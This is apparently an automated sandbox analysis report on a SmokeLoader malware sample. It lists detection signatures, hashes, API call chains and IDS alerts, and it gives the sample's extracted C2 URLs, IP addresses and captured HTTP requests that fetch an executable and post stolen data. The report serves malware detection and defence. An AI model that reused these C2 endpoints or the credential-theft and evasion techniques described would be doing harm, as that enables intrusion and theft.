Windows Analysis Report
9VgIkx4su0.exe

Overview

General Information

Sample name: 9VgIkx4su0.exe
renamed because original name is a hash value
Original sample name: 5d99d66ef42ec43af05b9304aebefdb6.exe
Analysis ID: 1525244
MD5: 5d99d66ef42ec43af05b9304aebefdb6
SHA1: b90f71e96df4a0d654aaab1fdfe2845c8dcb8032
SHA256: 4942ff94e613e09ebaada37b5d61a9b08459fcef987303c8dce1fd10868825ac
Tags: exeStealcuser-abuse_ch
Infos:

Detection

SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the windows firewall
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
SmokeLoader The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
 https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: 9VgIkx4su0.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\dghchav Avira: detection malicious, Label: HEUR/AGEN.1310247
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Avira: detection malicious, Label: HEUR/AGEN.1310247
Source: C:\Users\user\AppData\Roaming\eihchav Avira: detection malicious, Label: HEUR/AGEN.1310247
Found malware configuration
Source: 00000000.00000002.2114850031.0000000002370000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Roaming\eihchav ReversingLabs: Detection: 34%
Multi AV Scanner detection for submitted file
Source: 9VgIkx4su0.exe ReversingLabs: Detection: 34%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\dghchav Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\eihchav Joe Sandbox ML: detected
Machine Learning detection for sample
Source: 9VgIkx4su0.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Code function: 8_2_00007FF6DFE236F0 CryptExportKey,CryptExportKey, 8_2_00007FF6DFE236F0
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Code function: 8_2_00007FF6DFE23220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx, 8_2_00007FF6DFE23220
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_006E3098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW, 10_2_006E3098
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_006E3717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW, 10_2_006E3717
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_006E3E04 RtlCompareMemory,CryptUnprotectData, 10_2_006E3E04
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_006E11E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW, 10_2_006E11E1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_006E1198 CryptBinaryToStringA,CryptBinaryToStringA, 10_2_006E1198
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_006E123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA, 10_2_006E123B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_006E1FCE CryptUnprotectData,RtlMoveMemory, 10_2_006E1FCE
Source: C:\Windows\SysWOW64\explorer.exe Code function: 15_2_0019245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA, 15_2_0019245E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 15_2_00192404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA, 15_2_00192404
Source: C:\Windows\SysWOW64\explorer.exe Code function: 15_2_0019263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext, 15_2_0019263E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 18_2_02FE25A4 CryptBinaryToStringA,CryptBinaryToStringA, 18_2_02FE25A4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 18_2_02FE2799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext, 18_2_02FE2799
Uses 32bit PE files
Source: 9VgIkx4su0.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\9VgIkx4su0.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.5:50000 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50004 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50005 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50006 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50007 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50008 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50009 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50010 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50011 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50012 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50013 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50014 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50015 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50016 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50017 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50018 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50019 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50020 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50021 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50027 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50029 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50031 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50033 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Code function: 8_2_00007FF6DFE2FB4C GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose, 8_2_00007FF6DFE2FB4C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_006E2B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose, 10_2_006E2B15
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_006E1D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose, 10_2_006E1D4A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_006E3ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose, 10_2_006E3ED9
Source: C:\Windows\explorer.exe Code function: 13_2_00CB30A8 FindFirstFileW,FindNextFileW,FindClose, 13_2_00CB30A8
Source: C:\Users\user\AppData\Roaming\dghchav Code function: 38_2_004010E0 GetNumberFormatW,EnumCalendarInfoA,SetFileAttributesW,GetNumberFormatW,GetLogicalDriveStringsA,VerifyVersionInfoW,CopyFileW,GetStdHandle,GetComputerNameW,ClearCommBreak,InterlockedDecrement,EnumCalendarInfoA,GetTempPathA,_memset,CommConfigDialogW,GetVersionExW,CreateActCtxA,InterlockedIncrement,GetShortPathNameA,EnumCalendarInfoA,GetLocaleInfoA,SetVolumeMountPointA,GlobalWire,CreateEventW, 38_2_004010E0
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default\ Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49765 -> 190.224.203.37:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49798 -> 190.224.203.37:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49755 -> 190.224.203.37:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49776 -> 190.224.203.37:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49836 -> 190.224.203.37:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49826 -> 190.224.203.37:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49866 -> 190.224.203.37:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49875 -> 190.224.203.37:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49807 -> 190.224.203.37:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49896 -> 190.224.203.37:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49905 -> 190.224.203.37:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49915 -> 190.224.203.37:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49925 -> 190.224.203.37:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49886 -> 190.224.203.37:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49815 -> 190.224.203.37:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49943 -> 190.224.203.37:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49847 -> 190.224.203.37:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49955 -> 190.224.203.37:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49962 -> 190.224.203.37:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49787 -> 190.224.203.37:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49933 -> 190.224.203.37:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49973 -> 190.224.203.37:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50001 -> 190.224.203.37:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50002 -> 190.224.203.37:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49983 -> 190.224.203.37:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50003 -> 190.224.203.37:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50022 -> 190.224.203.37:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50025 -> 190.224.203.37:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50023 -> 190.224.203.37:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50024 -> 190.224.203.37:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49995 -> 190.224.203.37:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50030 -> 187.131.253.169:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50032 -> 187.131.253.169:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49857 -> 190.224.203.37:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50026 -> 190.224.203.37:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50028 -> 187.131.253.169:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50016 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50017 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50033 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50033 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50016 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50018 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50014 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50017 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50027 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50018 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50027 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50014 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50006 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50009 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50004 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50004 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50006 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50008 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50020 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50005 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50009 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50008 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50012 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50007 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50012 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50005 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50007 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50013 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50013 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50021 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50011 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50020 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50011 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50021 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50010 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50010 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50019 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50019 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50015 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50015 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50029 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50031 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50029 -> 23.145.40.162:443
Source: Network traffic Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50031 -> 23.145.40.162:443
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 187.131.253.169 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 190.224.203.37 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 23.145.40.164 443 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Network Connect: 23.145.40.162 443 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://nwgrus.ru/tmp/index.php
Source: Malware configuration extractor URLs: http://tech-servers.in.net/tmp/index.php
Source: Malware configuration extractor URLs: http://unicea.ws/tmp/index.php
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 190.224.203.37 190.224.203.37
Source: Joe Sandbox View IP Address: 190.224.203.37 190.224.203.37
Source: Joe Sandbox View IP Address: 23.145.40.164 23.145.40.164
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: UninetSAdeCVMX UninetSAdeCVMX
Source: Joe Sandbox View ASN Name: TelecomArgentinaSAAR TelecomArgentinaSAAR
Source: Joe Sandbox View ASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
Source: Joe Sandbox View ASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 72a589da586844d7f0818ce684948eea
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 23.145.40.162:443 -> 192.168.2.5:50004
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
Source: global traffic HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://ilsdlpkysrci.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: calvinandhalls.com
Source: global traffic HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://bebgtshlvflmuxm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 182Host: calvinandhalls.com
